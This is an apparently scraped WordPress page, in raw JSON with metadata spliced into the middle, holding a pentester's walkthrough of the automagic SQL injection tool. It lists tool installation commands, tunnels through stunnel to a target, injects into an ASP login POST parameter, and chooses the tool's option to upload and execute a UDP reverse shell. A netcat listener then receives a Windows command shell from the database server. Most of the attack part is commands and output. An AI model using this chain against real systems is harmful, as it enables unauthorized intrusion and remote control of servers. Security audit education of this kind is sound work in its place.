Automagic<\/p>\n
I have used automagic during an audit to enumerate tables and data from a backend database that was accessible from a SQL Injection vulnerability. This tool was successful when the tool that comes with HP Webinspect was not.<\/p>\n
The description of automagic from the www.packetstormsecurity.org is as follows:<\/p>\n
The automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided as part of the Applied Hacking & Intrusion Prevention training courses. In a nutshell it’s an automated SQL injection tool designed to help save time on pen tests. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned.<\/p>\n
The comments from the perl script say that it should be used on a Windows system. However, I had no problems using it on my Linux penetration testing laptop running Ubuntu 8.04. The script does not support SSL which is a problem if the site you are auditing only communicates over port 443. This is rectified by using stunnel to handle the SSL communications. I\u2019m not a fan of stunnel version 4. Below are the instructions on how I got stunnel version 3 running on my Ubuntu 8.04 system. For complete instuctions on how I get all my tools installed on my system see my tutorial here<\/a>.<\/p>\n #apt-get install libssl-dev zlib1g-dev<\/kbd> <\/p>\n Download the latest stunnel version 3 Download automagic from www.packetstormsecurity.org Automagic I have used automagic during an audit to enumerate tables and data from a backend database that was accessible from a SQL Injection vulnerability. This tool was successful when the tool that comes with HP Webinspect was not. The description of automagic from the www.packetstormsecurity.org is as follows: The automagic SQL Injector is part […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-178","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/178","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=178"}],"version-history":[{"count":3,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/178\/revisions"}],"predecessor-version":[{"id":258,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/178\/revisions\/258"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=178"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nhttp:\/\/www.stunnel.org\/download\/stunnel\/src\/stunnel-3.26.tar.gz
\n
\n#wget http:\/\/www.stunnel.org\/download\/stunnel\/src\/stunnel-3.26.tar.gz
\n#tar zxvf stunnel-3.26.tar.gz
\n#cd stunnel-3.26
\n#.\/configure --prefix=\/usr --bindir=\/usr\/bin --sbindir=\/usr\/bin
\n#make
\n#make install
\n<\/kbd>
\nWhen asked enter the following information (or whatever you agency information is)
\nCountry Name (2 letter code) [PL]:US
\nState or Province Name (full name) [Some-State]:Georgia
\nLocality Name (eg, city) []:Atlanta
\nOrganization Name (eg, company) [Stunnel Developers Ltd]:DOAA
\nOrganizational Unit Name (eg, section) []:ISAAS
\nCommon Name (FQDN of your server) [localhost]:audits.state.ga.us <\/p>\n
\n
\n#wget http:\/\/packetstormsecurity.org\/UNIX\/scanners\/automagic.zip
\n#unzip automagic.zip
\n<\/kbd>
\nBelow is a simple demonstration of getting a reverse shell back to my laptop giving me access to the database server as a local administrator.<\/p>\n\nroot@edge-linuxpen:~\/automagic# stunnel3 -c -d localhost:80 -r state.govt.agency.us:443\nroot@edge-linuxpen:~\/automagic# perl injector.pl -h localhost -f \/APPLICATION\/Folder\/Authentication.asp -t POST -q YES\n\n[*] Welcome to the Sec-1 Automagical SQL injector [*]\n http:\/\/www.sec-1.com\n\n Author: Gary O'leary-Steele\n Ver: 0.1 Beta\n Date: 7\/11\/05\n\n[!] Please enter the vulnerable POST string placing the keyword\n QUERYHERE within the vulnerable POST param.\n\nNote: A command line param -q YES|NO inserts a quote character \nbefore the injected SQL.However if there are any other requirements\nsuch as closing parentheses they should be added here.\n\n e.g Param:username=hello&password=QUERYHERE\n\nPost Param:Submit=Submit&Password=pwned&Username=QUERYHERE\n\nPlease select one of the following:\n\n1. Explore Tables (Using CREATE table method)\n2. Explore Tables (Using CAST method)\n3. Upload and Execute A UDP Reverse Shell\n4. Upload A file (Debug Script)\n5. Interactive Shell\n6. Privilege Escalation Attacks\n7. Look for other SQL servers (coming soon)\n\nWhere do you want to go today?[1-6]:\nWhere do you want to go today?[1-6]:3\nEnter your IP address:192.168.0.1\nEnter you listener port:53\nUploading debug script file to localhost:80\nWaiting for Debug to do its work..5 seconds...\n4\nPlease select one of the following:\n\n1. Explore Tables (Using CREATE table method)\n2. Explore Tables (Using CAST method)\n3. Upload and Execute A UDP Reverse Shell\n4. Upload A file (Debug Script)\n5. Interactive Shell\n6. Privilege Escalation Attacks\n7. Look for other SQL servers (coming soon)\n\nWhere do you want to go today?[1-6]:\n<\/code><\/pre>
\nOn my laptop I start NetCat to listen for the connection from the database server.
\n\nroot@edge-linuxpen:~\/automagic# nc -vvv -l -u -p 53\nlistening on [any] 53 ...\nconnect to [192.168.0.1] from externalhost.state.govt.agency.us [xxx.xxx.xxx.xxx] 48094\nMicrosoft Windows 2000 [Version 5.00.2195]\n(C) Copyright 1985-2000 Microsoft Corp.\n\nC:\\WINNT\\system32>\n<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"